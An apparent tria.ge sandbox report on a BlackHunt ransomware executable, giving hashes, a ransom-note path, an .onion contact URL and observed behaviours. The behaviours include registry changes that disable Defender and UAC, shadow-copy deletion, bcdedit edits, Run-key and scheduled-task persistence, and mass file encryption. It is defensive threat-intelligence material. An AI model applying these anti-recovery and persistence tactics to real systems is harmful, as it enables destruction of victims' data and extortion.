Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
114s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 01:19
Static task
static1
Behavioral task
behavioral1
Sample
ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
Resource
win10v2004-20231215-en
General
-
Target
ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe
-
Size
707KB
-
MD5
352a8dfb2827d4acb843a31d0d5cb6e9
-
SHA1
2b0c654ca2329c2c9b04fb39c7cd1f3a534956b1
-
SHA256
ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0
-
SHA512
cc6a00c5114aec92ddd22aa2776b646919e9d7056d3dd2edbb81be819733b3c24505d94d7916abb70af7215acdb6b4394c485af1b55bf3cbe0893a78bcae2efb
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1V8Rvnh:6uaTmkZJ+naie5OTamgEoKxLWgFh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1596 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2032 bcdedit.exe 1788 bcdedit.exe -
Renames multiple (2344) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2348 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\H: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\J: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\T: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\X: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\B: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\K: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\I: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\S: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\M: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\W: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\U: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\P: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\V: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\O: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\R: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\L: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\Z: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\N: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\Q: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\Y: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened (read-only) \??\A: ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rainy_River ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jre7\bin\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jre7\lib\security\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureA.png ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Halifax ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\locale\el\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_ButtonGraphic.png ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Krasnoyarsk ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jre7\lib\fonts\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_MATTE_PAL.wmv ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jre7\lib\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Rome ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\UndoBackup.AAC ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_Private.key ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\#BlackHunt_ReadMe.hta ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#BlackHunt_ReadMe.txt ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2664 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1604 vssadmin.exe 3060 vssadmin.exe 2928 vssadmin.exe 1136 vssadmin.exe 2776 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 vssadmin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ vssadmin.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeRestorePrivilege 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeBackupPrivilege 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeTakeOwnershipPrivilege 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeAuditPrivilege 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeSecurityPrivilege 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeIncBasePriorityPrivilege 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Token: SeBackupPrivilege 2628 vssvc.exe Token: SeRestorePrivilege 2628 vssvc.exe Token: SeAuditPrivilege 2628 vssvc.exe Token: SeBackupPrivilege 2968 wbengine.exe Token: SeRestorePrivilege 2968 wbengine.exe Token: SeSecurityPrivilege 2968 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2448 wrote to memory of 2140 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 31 PID 2448 wrote to memory of 2140 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 31 PID 2448 wrote to memory of 2140 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 31 PID 2448 wrote to memory of 2140 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 31 PID 2448 wrote to memory of 2776 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 151 PID 2448 wrote to memory of 2776 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 151 PID 2448 wrote to memory of 2776 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 151 PID 2448 wrote to memory of 2776 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 151 PID 2448 wrote to memory of 2608 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 41 PID 2448 wrote to memory of 2608 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 41 PID 2448 wrote to memory of 2608 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 41 PID 2448 wrote to memory of 2608 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 41 PID 2140 wrote to memory of 3060 2140 cmd.exe 147 PID 2140 wrote to memory of 3060 2140 cmd.exe 147 PID 2140 wrote to memory of 3060 2140 cmd.exe 147 PID 2448 wrote to memory of 2716 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 37 PID 2448 wrote to memory of 2716 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 37 PID 2448 wrote to memory of 2716 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 37 PID 2448 wrote to memory of 2716 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 37 PID 2448 wrote to memory of 2752 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 40 PID 2448 wrote to memory of 2752 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 40 PID 2448 wrote to memory of 2752 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 40 PID 2448 wrote to memory of 2752 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 40 PID 2448 wrote to memory of 2596 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 42 PID 2448 wrote to memory of 2596 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 42 PID 2448 wrote to memory of 2596 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 42 PID 2448 wrote to memory of 2596 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 42 PID 2776 wrote to memory of 2624 2776 vssadmin.exe 65 PID 2776 wrote to memory of 2624 2776 vssadmin.exe 65 PID 2776 wrote to memory of 2624 2776 vssadmin.exe 65 PID 2448 wrote to memory of 2644 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 64 PID 2448 wrote to memory of 2644 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 64 PID 2448 wrote to memory of 2644 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 64 PID 2448 wrote to memory of 2644 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 64 PID 2448 wrote to memory of 2656 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 55 PID 2448 wrote to memory of 2656 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 55 PID 2448 wrote to memory of 2656 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 55 PID 2448 wrote to memory of 2656 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 55 PID 2448 wrote to memory of 3064 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 51 PID 2448 wrote to memory of 3064 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 51 PID 2448 wrote to memory of 3064 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 51 PID 2448 wrote to memory of 3064 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 51 PID 2608 wrote to memory of 3028 2608 cmd.exe 52 PID 2608 wrote to memory of 3028 2608 cmd.exe 52 PID 2608 wrote to memory of 3028 2608 cmd.exe 52 PID 2448 wrote to memory of 1896 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 43 PID 2448 wrote to memory of 1896 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 43 PID 2448 wrote to memory of 1896 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 43 PID 2448 wrote to memory of 1896 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 43 PID 2448 wrote to memory of 3056 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 49 PID 2448 wrote to memory of 3056 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 49 PID 2448 wrote to memory of 3056 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 49 PID 2448 wrote to memory of 3056 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 49 PID 2448 wrote to memory of 1968 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 45 PID 2448 wrote to memory of 1968 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 45 PID 2448 wrote to memory of 1968 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 45 PID 2448 wrote to memory of 1968 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 45 PID 2448 wrote to memory of 2876 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 47 PID 2448 wrote to memory of 2876 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 47 PID 2448 wrote to memory of 2876 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 47 PID 2448 wrote to memory of 2876 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 47 PID 2448 wrote to memory of 2756 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 54 PID 2448 wrote to memory of 2756 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 54 PID 2448 wrote to memory of 2756 2448 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 54 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
